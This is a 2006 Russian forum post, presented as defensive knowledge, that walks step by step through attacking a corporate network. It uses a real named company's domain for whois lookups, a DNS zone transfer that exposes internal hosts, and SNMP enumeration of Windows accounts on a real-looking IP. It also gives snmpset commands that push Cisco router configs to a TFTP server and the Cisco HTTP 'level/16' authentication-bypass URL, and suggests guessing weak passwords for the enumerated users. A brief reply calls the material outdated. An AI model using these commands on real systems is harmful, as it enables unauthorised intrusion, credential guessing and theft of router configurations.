Корпаративные сети

Корпаративные сети

fr1k

Сообщения: n/a

Изменения

Автор: Greyman
Дата: 01-09-2006
Описание: реклама

Как известно, наиболее эффективной защитой от потенциального (и не только) нападения является знание методик проведения этих атак. В данной статье я попытаюсь проанализировать данный аспект.
Во-первых,определим кто и по каким целям проводит атаки:
1 - Червь, робот.
Данный субъект не опасен, так как работает по простому алгоритму, а именно: производит сканирование сети на уязвимые компьютеры и пытается их заразить.
Уровень его опасности, при наличии грамотно сконфигурированной сети, минимален. Цели как таковой не имеет.
Пример такого червя - MSBlast.

2 - "Скрипт Кидди".
Данный субъект не особо отличается от первого в методах работы. Тупо сканирует сеть на "дырявые" компьютеры и пытается их сломать.
Уровень опастности маленький, чуть повыше обычного червя. Цели - использование компьютеров для рыссылки спама, либо создание "ботнета" для проведения DDOS атак .
Если атакует сайт, то обычно для проведения deface. Некоторые атакуют специфические компьютеры на диалап соединениях, чтобы украсть
логинпароль для доступа в интернет.
Пример такого человека - возьмите любой дефейс и посмотрите на greets`ы.

3 - "Энтузиаст"
Данный субъект, в отличае от первых двух, представляет средний уровень опасности. Это, обычно, люди, хорошо разбирающиеся в
администрировании различных операционных систем, и знающие основы безопасности. Представляют опастность тем, что в отличие от "скрипт
кидов" обладают большей "творческой" способностью. Обычно у них нету конкретных целей, а "взломы" производятся из любопытства. Например, "друг попросил посмотреть” или "интересно стало".
Примером такого человека может служить Андриан Ламо, который взламывал крупные компании, а затем сообщал им об этом.

4 - "Корпоративный шпион."
Данные субъекты наиболее опасны. В отличае от первых трех у них есть конкретная цель, опыт и средства для проведения атаки. В виде цели
служит обычно какая-либо специальная информация компании (разработки или база клиентов). Обычно они проводят "комплексный" анализ
безопасности вашей сети. Пытаются найти малейшие прорехи в безопасности и попытаться как-либо (как только можно!) их использовать.

Поскольку корпоративный шпион, по моему мнению, наиболее потенциальный и технически опасный противник, постараемся проанализировать его
методы атак.

Вначале проводится стандартная "лобовая" атака. Для этого надо знать собственно говоря "что атаковать".
Обычно у жертвы имеется свой вебсайт

Возьмем для примера www.su29.ru
Чаще всего, сайт жертвы - самая хорошо защищенная "точка", так как она расчитана на "публику" и поэтому администратор заботится о её безопасности в первую очередь.
Первым делом нам необходимо узнать IP адрес этого сайта. Обычно такие сайты либо находятся в собственном IP диапазоне компании, либо на хостинге
какого-либо крупного хостинг провайдера. Например сайт майкрософта находится у akamai.
bash-2.05b$ host www.su29.ru
www.su29.ru has address 81.200.0.48
bash-2.05b$
Вот теперь мы получили адрес жертвы. Что теперь? Нам необходимо узнать, что это за IP адрес, кому принадлежит, какой сети и после этого решать, что делать дальше.
bash-2.05b$ whois 81.200.0.48
[Querying whois.ripe.net]
[whois.ripe.net]
% This is the RIPE Whois server.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-serv...copyright.html

inetnum: 81.200.0.0 - 81.200.1.255
netname: SU29CORENET
descr: SU29 Telecom ISP
descr: 6/2 Ramenki ul, Moscow, Russia
country: RU
admin-c: DZ191-RIPE
tech-c: VG43-RIPE
status: ASSIGNED PA
mnt-by: SU29-MNT
mnt-routes: RU-CORBINA-MNT
notify: noc@su29.ru
changed: vgon@su29.ru 20021002
source: RIPE
... etc

Как мы видим, подсеть, принадлежащая компании, 81.200.0-1.* и сайт находится в этом же диапазоне. Что теперь? А это еще не все. У
компании, возможно, имеются и другие IP диапазоны. Надо посмотреть информацию о домене. В первую очередь, нас интересуют MX и NS записи.
Что это такое?
MX - The mail exchanger. Когда мы отсылаем письмо, например, на admin@su29.ru почтовый сервер узнает, какой почтовый сервер отвечает за
домен @su29.ru. Таким образом, MX запись соответствует почтовому серверу компании.
NS - The name server for the named zone. Когда мы делаем resolve домена третьего уровня и ниже, например, admin.s29.ru общение
происходит с DNS сервером, отвечающим за домен su29.ru адрес этого сервера - NS запись.
Ну чтож, попробуем снять эти записи.
bash-2.05b$ host -t mx su29.ru
su29.ru mail is handled by 20 smtp.su29.ru.
bash-2.05b$ host -t ns su29.ru
su29.ru name server ns.su29.ru.
su29.ru name server ns3.su29.ru.
bash-2.05b$
Узнаем их IP адреса.
bash-2.05b$ host ns.su29.ru.
ns.su29.ru has address 81.200.0.1
bash-2.05b$ host ns3.su29.ru.
ns3.su29.ru has address 213.221.13.9
bash-2.05b$ host smtp.su29.ru
smtp.su29.ru has address 81.200.3.6
bash-2.05b$
smtp.su29.ru находится в диапазоне, "вышедшем" за рамки, которые нам дал whois.
На его IP адрес whois нам выдал следущее.
inetnum: 81.200.3.0 - 81.200.4.255
netname: SU29CORENET
descr: SU29 Telecom ISP
descr: 6/2 Ramenki ul, Moscow, Russia
country: RU
Как видно, диапазон находится рядом.
inetnum: 213.221.13.0 - 213.221.13.255
netname: SOVINTEL-ROSPROMBANK
descr: OOO "Rosprombank" Ltd
descr: 35 bld.2 Miasnitskaya ul
descr: Moscow 101000 Russia
country: RU
А вот в этом диапазоне находится сервер ns3.su29.ru
Скорее всего, это Secondary DNS сервер.
Теперь нам бы очень пригодилось знать, что и где находится у данной компании. А еще может и дополнительные IP адреса...
У днс есть такая вещь как "Zone Transfer". Она пересылает все данные о доменах с DNS сервера. Ну что же, попробуем указать DNS серверы
нашего подопытного и снять с них эти данные.
(чтобы листинг получился более красивым я добавил ns.su29.ru в /etc/resolv и сделал host -l su29.ru)
bash-2.05b$ host -l su29.ru
su29.ru SOA ns.su29.ru. hostmaster.su29.ru. 2004081600 28800 7200 604800 86400
su29.ru name server ns.su29.ru.
su29.ru name server ns3.su29.ru.
su29.ru has address 81.200.0.48
su29.ru mail is handled by 20 smtp.su29.ru.
lefutur-213.su29.ru has address 81.200.7.213
lefutur-193.su29.ru has address 81.200.7.193
vpn-86.su29.ru has address 81.200.1.86
lefutur-214.su29.ru has address 81.200.7.214
lefutur-194.su29.ru has address 81.200.7.194
vpn9-1.su29.ru has address 81.200.9.1
vpn-87.su29.ru has address 81.200.1.87
lefutur-215.su29.ru has address 81.200.7.215
lefutur-195.su29.ru has address 81.200.7.195
vpn9-2.su29.ru has address 81.200.9.2
vpn-90.su29.ru has address 81.200.1.90
vpn-88.su29.ru has address 81.200.1.88
auth.su29.ru has address 81.200.0.48
...etc
чтож, достаточно интересно! Мы видим IP адреса определенных компьютеров и их имена, по которым можно определить их функцию в сети данной
компании. Чем это опасно? ну для начала тем, что так можно найти специальные сервера компании. Например ВПН сервер (VPN, virtual private
network), которым пользуются работники фирмы для доступа в корпоративную сеть или же, например, прокси серверы компании. Ну и, соответственно,
новые IP адреса, диапазоны и так далее - тоесть потенциальные "жертвы".
В принципе, насчёт разведки этого хватит. Добавлю только, что еще есть такой сайт как http://www.fixedorbit.com/search.htm
Принцип работы я описывать не буду. Зайдите и посмотрите сами. По данным, таким как ASN, домен или просто название фирмы, вы сможете снять данные об IP диапазонах, принадлежащих данной фирме.

Теперь, собственно, перейдем к самой атаке. Для начала определимся, что мы можем найти на этих IP диапазонах:
(1) серверы.
(2) рабочие станции.
(3) сетевое оборудование.
(4) другое оборудование.

Серверы бывают в основном либо на базе WinNT (в том числе 2k,2003 и все остальные), либо на базе какого либо из UNIX`ов (чаще всего
встречаются Solaris от Sun Microsystems, потом FreeBSD и конечно же Linux). Как правило, эти компьютеры настроены
относительно грамотно, так как за ними следит администратор. Так что тут всё зависит от его компетентности и объективных
причин (таких как, например, лень). Так же обычно на них стоят какие либо сервисы, к которым открыт доступ и которые представляют из себя
потенциальную "уязвимость".

Рабочие станции - почти всегда на базе WinNT, реже на Win98. На UNIX`ах встречается достаточно редко, настолько
редко что можно сказать что не встречается вообще ;-) .Как правило, на них не стоит каких-либо дополнительных приложений
или сервисов. За этими машинами администратор не так активно следит, как за серверами, поэтому часто на таких компьютерах оказываются
такие элементарные вещи, как логин равный паролю, или же просто не стоит патч на уязвимость, о которой уже известно без малого пару лет...

Сетевое оборудование - обычно это роутеры фирмы Cisco. По крайней мере, рассказывать я буду о них, так как от всего
остального толку не особо много. Хотя тут всё зависит от фантазии "злоумышленника"...

Другое оборудование - обычно всякие датчики, индикаторы или сетевые принтеры. Толку от них тоже не особо много.

А теперь я расскажу, как это всё злоумышленник может использовать.

Начну в обратном порядке, по мере возрастания "возможностей".

Другое оборудование - толку от него обычно не особо много, а если и есть - то особо специфический. Например, можно найти машину с
security камерами, показывающими обзор помещения или сетевой принтер. Если от первого еще будет какая-то польза, если вы,
например, хотите "ограбить" данную фирму в "реале" и следить за объектами в ней. То от принтера максимум что вы сможете сделать -
так это напечатать в духе "скрипт кидов" например "я вас поломал, гыгыгы". От данного оборудования есть смысл только если на нем вы
можете как-либо скачать конфигурацию и "вытащить" оттуда loginpassword на администратирование данного устройства, так как эти
loginpassword можно будет попробовать на других компьютерах или устройствах, от которых больше пользы. А учитывая, что администратор
тоже человек, и ему очень хочется поставить везде один и тот же пароль... Ну вы поняли идею. Описывать способы "взлома" я не буду так
как таких устройств большое множество, а встречаются они довольно не часто.

Сетевое оборудование - если это какой-либо тупой "свитч" левой компании то от него толку будет не больше чем от того что написано
абзацем выше. Но если же это более менее "серьезный" роутер от Cisco или кого-либо еще, перед вами открываются большие возможности. Во
первых если вы имеет к такой штуке доступ - и на ней есть telnet то вы можете организовать за его счет "туннелинг" спецальной
программой или просто делать telnet на компьютеры, находящиеся внутри сети фирмы. Вы также можете поднять свой собственный VPN в
своей виртуальной сети и сделать NAT (network address translation) из неё, тем самым вы будете работать с IP адреса роутера. А как
правило, если роутер находится в сети компании (особенно внутренней), он имеет гораздо больший "доступ" к самой сети и в том числе к другим
компьютерам, которые потенциально можно взломать. (Как это сделать конфигурацию не превожу, так как это займет много времени и не
относится к теме статьи). На роутере также можно организовать "снифинг" пакетов, проходящих через него. На роутерах фирмы Cisco это
делается показыванием буффера роутера (командый show buffers) или включением дебага проходящих TCP пакетов (debug ip packet dump),
после этого содержимое пакетов будет выводится на монитор (чтобы увидеть это, надо набрать terminal monitor (включает режим монитора)).
Учтите, если роутер интенсивно используется такой режим, произведет на него DOS. Есть и более технологичные методы снифинга, такие как
пропускание всего трафика через "левый" компьютер со снифером, но это увеличивает конечный пинг и делает "систему" более заметной для
администратора. Взлом роутера фирмы Cisco в основном производится тремя путями
(1) через SNMP
(2) через "сервисы"
(3) через подбор пароля
SNMP - Simple Network Management Protocol. Как видно из названия, это простой протокол для сетевого управления. Сервис этот находится
на 161 порту и работает по UDP. Особенности работы описывать не буду - расскажу только что мы можем с помощью него поиметь . У SNMP есть чтото
вроде "аутентификации" - это community string. Есть два типа community. Это либо READ-ONLY, либо READ-WRITE. С первой мы можем считать
информацию с роутера, определенные данные. Например, название роутера, его uptime и т.д. Бывает полезно например определить "имя"
роутера и попробывать его как READ-WRITE community или как пароль на роутер - иногда проходит. C READ-WRITE community вы как правило
имеете возможность изменять некоторые значения в конфигурации роутера, а также например дать роутеру команду залить его конфигурацию по TFTP
на определенный сервер.
По умолчанию READ-ONLY community это "public" а READ-WRITE это "private".
Так же многие Cisco роутеры имеют "встроенные" community. Это "cable-docsis" и "ILMI".
Вот пример как это выглядит:

bash-2.05b$ snmpget 201.194.164.2 public .1.3.6.1.2.1.1.5.0
system.sysName.0 = OCTET STRING: "lannet-gw"
bash-2.05b$

snmpget программа входит в пакет программ для работы с SNMP. Идентификатор объекта .1.3.6.1.2.1.1.5.0 - это system.sysName.0 - в ней
записано значение "имя роутера". Используя snmpset (если бы community была с правом записи) мы могли бы записать свое имя роутеру,
только это бы нам ничего не дало.
DOWNLOAD: snmpset #.#.#.# ILMI .1.3.6.1.4.1.9.2.1.55.$.$.$.$ s "cisco1.cfg"
UPLOAD: snmpset #.#.#.# ILMI .1.3.6.1.4.1.9.2.1.53.$.$.$.$ s "cisco1.cfg"
вот так можно заливать и сливать конфиг файл роутера на TFTP сервер. Там где #.#.#.# - это IP адрес роутера, а $.$.$.$ - IP адрес
TFTP сервера (учтите под UNIX`ами надо в директории TFTP сервера создать файл с именем cisco1.cfg и присвоить ему chmod a+w)
Вот краткий список SNMP идентификаторов (самые полезные на мой взгляд)
.1.3.6.1.2.1.1.5.0 - Имя компьютера
.1.3.6.1.2.1.1.1.0 - Описание системы
.1.3.6.1.2.1.4.21.1.1 - Таблица роутинга
.1.3.6.1.2.1.6.13 - NETSTAT (используя SNMPWALK)
.1.3.6.1.2.1.1.3 - UPTIME.
Также SNMP часто встречается и на других компьютерах, в том числе UNIX и NT. В UNIX`е максимум интересного что в них можно сделать - это
узнать версию OS через "Описание системы" и получить список активных соединений. В NT у SNMP намного больше "полезных" функций.
Через SNMPWALK можно получить список юзеров на компьютере используя Object ID .1.3.6.1.4.1.77.1.2.25
Например
bash-2.05b$ snmpwalk 63.224.248.114 public .1.3.6.1.4.1.77.1.2.25
enterprises.77.1.2.25.1.1.4.100.101.108.120 = OCTET STRING: "delx" Hex: 64 65 6C 78
enterprises.77.1.2.25.1.1.4.104.111.109.101 = OCTET STRING: "home" Hex: 68 6F 6D 65
enterprises.77.1.2.25.1.1.4.119.111.114.107 = OCTET STRING: "work" Hex: 77 6F 72 6B
enterprises.77.1.2.25.1.1.5.71.117.101.115.116 = OCTET STRING: "Guest"
enterprises.77.1.2.25.1.1.6.67.97.109.101.114.97 = OCTET STRING: "Camera"
enterprises.77.1.2.25.1.1.6.75.101.108.108.105.77 = OCTET STRING: "KelliM"
enterprises.77.1.2.25.1.1.7.73.110.101.116.75.105.116 = OCTET STRING: "InetKit"
enterprises.77.1.2.25.1.1.8.69.120.99.104.97.110.103.101 = OCTET STRING: "Exchange"
enterprises.77.1.2.25.1.1.9.49.83.81.76.65.100.109.105.110 = OCTET STRING: "1SQLAdmin"
enterprises.77.1.2.25.1.1.9.74.111.104.110.82.97.122.111.114 = OCTET STRING: "JohnRazor"
enterprises.77.1.2.25.1.1.10.49.69.120.99.104.97.110.103.101.49 = OCTET STRING: "1Exchange1"
enterprises.77.1.2.25.1.1.10.77.105.107.101.77.117.110.115.111.110 = OCTET STRING: "MikeMunson"
enterprises.77.1.2.25.1.1.11.65.109.98.101.114.72.97.110.115.111.110 = OCTET STRING: "AmberHanson"
enterprises.77.1.2.25.1.1.11.71.114.101.103.71.97.114.108.105.99.107 = OCTET STRING: "GregGarlick"
enterprises.77.1.2.25.1.1.12.65.110.100.114.101.97.82.105.115.110.101.114 = OCTET STRING: "AndreaRisner"
enterprises.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = OCTET STRING: "Administrator"
enterprises.77.1.2.25.1.1.13.82.105.99.107.84.101.109.112.108.101.116.111.110 = OCTET STRING: "RickTempleton"
enterprises.77.1.2.25.1.1.14.76.68.65.80.95.65.78.79.78.89.77.79.85.83 = OCTET STRING: "LDAP_ANONYMOUS"
enterprises.77.1.2.25.1.1.15.83.81.76.65.103.101.110.116.67.109.100.69.120.101.99 = OCTET STRING: "SQLAgentCmdExec"
enterprises.77.1.2.25.1.1.17.73.85.83.82.95.77.85.76.84.73.83.69.67.85.82.69.49 = OCTET STRING: "IUSR_MULTISECURE1"
enterprises.77.1.2.25.1.1.17.73.85.83.82.95.77.85.76.84.73.83.69.67.85.82.69.50 = OCTET STRING: "IUSR_MULTISECURE2"
enterprises.77.1.2.25.1.1.17.73.87.65.77.95.77.85.76.84.73.83.69.67.85.82.69.49 = OCTET STRING: "IWAM_MULTISECURE1"
enterprises.77.1.2.25.1.1.17.73.87.65.77.95.77.85.76.84.73.83.69.67.85.82.69.50 = OCTET STRING: "IWAM_MULTISECURE2"
enterprises.77.1.2.25.1.1.19.77.66.83.68.77.48.95.77.85.76.84.73.83.69.67.85.82.69.49 = OCTET STRING: "MBSDM0_MULTISECURE1"
bash-2.05b$
Как мы видим достаточно много всяких разных юзеров, пароли которых не мешает проверить на всякие "qwerty" или "login"="password".

У роутеров Cisco было в основном две серьезных уязвимости. Это в сервисе finger (можно получить exec доступ на
роутер), а также в сервисе HTTP (можно получить конфигурацию роутера).
Про ошибку в сервисе finger я ничего определенного сказать не могу, так как еще ни разу не удалось проэксплуатировать данную уязвимость. Складывается ощущение, что либо
это вообще какойто миф, либо это было на сверх древних роутерах. А вот второе (http bug) встречается довольно таки часто. Если мы пошлем
роутеру запрос типа http://ROUTER_IP_ADDRESS/level/16/exec/show/conf то обойдем всю его систему аутентификации (роутеру становится
плохо когда уровень доступа указан выше 15и (максимального)) и скачаем конфигурацию роутера.

З.Ы.
Компьютеры это плохо! Используйте счёты ;-)

Отправлено: 23:42, 31-08-2006

Butunin Klim

Ветеран

Сообщения: 1482
Благодарности: 117

Профиль | Отправить PM | Цитировать

Старо как мир.

-------
Сообщение помогло? В знак благодарности НАЖМИТЕ ПОЛЕЗНОЕ СООБЩЕНИЕ

Мы зрим не то, что есть вокруг,
А то, что можем видеть зримо.
А то, что зреть не достижимо
Нам не узреть во век веков.

Мой веб-магазин товары Amway http://butunina.ru

Отправлено: 14:41, 01-09-2006 | #2

Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.